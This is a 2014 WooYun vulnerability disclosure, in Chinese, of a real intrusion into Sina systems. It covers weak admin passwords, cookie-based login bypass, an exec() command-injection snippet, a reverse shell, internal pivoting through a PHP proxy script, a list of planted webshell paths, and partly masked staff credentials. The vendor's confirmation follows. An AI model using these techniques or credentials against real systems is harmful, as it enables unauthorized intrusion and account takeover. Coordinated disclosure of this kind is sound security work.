当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083508

漏洞标题:新浪漏洞礼包可任意修改微博内容个人信息等

相关厂商:新浪

漏洞作者: Noxxx

提交时间:2014-11-16 20:54

修复时间:2014-12-31 20:56

公开时间:2014-12-31 20:56

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-16: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-28: 细节向核心白帽子及相关领域专家公开
2014-12-08: 细节向普通白帽子公开
2014-12-18: 细节向实习白帽子公开
2014-12-31: 细节向公众公开

简要描述:

新浪漏洞礼包

详细说明:

http://***.sina.com.cn/ 这个 在DZ7.2注入爆出来的时候,我把它的 uc_key注入出来了保存了,后来发现这个 uc_key没变,遂getshell
地址:http://***.sina.com.cn/uc_server/data/tmp/a_ok.php
http://123.103.**.**/ 这个admin为弱口令:123456789 遂拿shell
地址:http://123.103.**.**/static/space/t4/space.php
http://**.video.sina.com.cn/ 新浪视频管理平台 弱口令很多。遗憾我只记录了一个。。请自查。

ju***ie:ju***ie


video.png


http://***.video.sina.com.cn/live5/index.php/login 演播室管理系统,爆破之 弱口令很多。遗憾我只记录了一个。。请自查。

lian***a1:lian***a1


live_1.png


http://202.108.*.**:8080/ 投放内容管理系统 爆破之, 弱口令很多。请自查

ad_m_1.png


http://202.106.**.**:8080/index.php 新浪图片过滤审核系统(估计是老系统了)
测试登录发现 登录失败都会 把一些cookie清空掉。于是我自己设置了cookie 然后登录上去了

sina_p_mange.png


sina_p_mange_1.png


http://202.108.**.**/ 这个 存在备份文件:htdocs.tar
下载下来 看了下代码 里面可以执行执行命令

$queryCmd=stripslashes ($_REQUEST['queryCmd']);	
$command.="|$queryCmd";
$resVal=exec($command,$res);


反弹了shell回来.FreeBSD 4.8p..开启代理的使用不了。
于是我看看 上次提交的漏洞那个ip 外网是不能访问了 可是我用它的内网ip正常访问,使用内网的webshell 开启代理了。
检查了上次的rsync的ip发现仍然能访问啊。
rsync 同步过去pub_admin_weibo_com_admin 这个里面一个 一句话。发现可以访问.但是过一会就没了。于是我执行 ifconfig获得ip后,中转了一下顺利的连接上

$post = http_build_query($_POST);
$url = "http://pub.admin.weibo.com/cs.php";
$ip=$_GET['ip'];
echo dfopen($url,0,$post,'',FALSE,$ip);
function dfopen($url, $limit = 0, $post = '', $cookie = '', $bysocket = FALSE, $ip = '', $timeout = 15, $block = TRUE) {
	$return = '';
	$matches = parse_url($url);
	$host = $matches['host'];
	$path = $matches['path'] ? $matches['path'].(@$matches['query'] ? '?'.@$matches['query'] : '') : '/';
	$port = !empty($matches['port']) ? $matches['port'] : 80;
	if($post) {
		$out = "POST $path HTTP/1.0\r\n";
		$out .= "Accept: */*\r\n";
		$out .= "Accept-Language: zh-cn\r\n";
		$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
		$out .= "User-Agent: X\r\n";
		$out .= "Host: $host\r\n";
		$out .= 'Content-Length: '.strlen($post)."\r\n";
		$out .= "Connection: Close\r\n";
		$out .= "Cache-Control: no-cache\r\n";
		$out .= "Cookie: $cookie\r\n\r\n";
		$out .= $post;
	} else {
		$out = "GET $path HTTP/1.0\r\n";
		$out .= "Accept: */*\r\n";
		$out .= "Accept-Language: zh-cn\r\n";
		$out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
		$out .= "Host: $host\r\n";
		$out .= "Connection: Close\r\n";
		$out .= "Cookie: $cookie\r\n\r\n";
	}
	$fp = @fsockopen(($ip ? $ip : $host), $port, $errno, $errstr, $timeout);
	if(!$fp) {
		return '';
	} else {
		stream_set_blocking($fp, $block);
		stream_set_timeout($fp, $timeout);
		@fwrite($fp, $out);
		$status = stream_get_meta_data($fp);
		if(!$status['timed_out']) {
			while (!feof($fp)) {
				if(($header = @fgets($fp)) && ($header == "\r\n" ||  $header == "\n")) {
					break;
				}
			}
			$stop = false;
			while(!feof($fp) && !$stop) {
				$data = fread($fp, ($limit == 0 || $limit > 8192 ? 8192 : $limit));
				$return .= $data;
				if($limit) {
					$limit -= strlen($data);
					$stop = $limit <= 0;
				}
			}
		}
		@fclose($fp);
		return $return;
	}
}


管理平台的密码

admin_weibo_data.png


认证登录几乎都是使用ldap认证的,源码里有ldap的密码

ldap_br_3.png


ldap_br_4.png


ldap_br_5.png


漏洞证明:

全部员工的信息..
贴几个密码

mask 区域 
*****Sina9*****
*****ckhamh*****


同步了几个shell 地址:

mask 区域 
1.http://**.**.**/api/cs.php_
2.http://**.**.**/include/sc.phpip=10.55.40.32_
3.http://**.**.**/include/sc.phpip=10.73.14.45_
4.http://**.**.**/include/sc.phpip=10.13.0.157_
5.http://**.**.**/include/sc.phpip=10.13.0.158_
6.http://**.**.**/include/sc.phpip=10.13.0.160_
7.http://**.**.**/cs.php_
8.http://**.**.**/cs.php_
9.http://**.**.**/cs.php_
10.http://**.**.**/cs.php_
11.http://**.**.**/api/cs.php_
12.http://**.**.**/album/uploads/as.php (上传的)_
13.http://**.**.**/mh.php_
14.http://**.**.**/lib/smarty/internals/core.load_xml.php


svn_1.png


(如果我能找到私匙的话 就能加密回SUB了,不过遗憾没找到。。)
找了一些接口,(还有些接口未测试)
获取任意微博:

weibo_priv_1.jpg


任意修改信息 包括昵称 说明 域名等等...

edit_info_0.png


修改任意已经发送的微博

weibo_edit_0.png


改了一下测试账号

end.png


mask 区域 
*****ode*****
*****	wang*****
*****liuf*****
*****liuji*****
*****zhangt*****
*****boy*****
*****yingj*****
*****	wen*****
*****houw*****
*****	sun*****
*****xiy*****
*****tingti*****
*****	xi*****
*****	chen*****
*****	xia*****
*****	wan*****
*****yangzh*****
*****jiaoj*****
*****	zou*****
*****	lik*****
*****sunw*****
*****	xia*****
*****xiaow*****
*****xiong*****
*****luol*****
*****	yin*****
*****liqi*****
*****	hai*****
*****	yan*****
*****	wang*****
*****cod*****

修复方案:

自查弱口令,和下线一些过期的系统..

版权声明:转载请注明来源 Noxxx@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-11-18 00:24

厂商回复:

非常感谢这位安全研究员给我们反馈的安全问题,漏洞已经迅速修复。对于使用特设微博账号@appsecssrc进行安全问题验证再次表示感谢。

最新状态:

暂无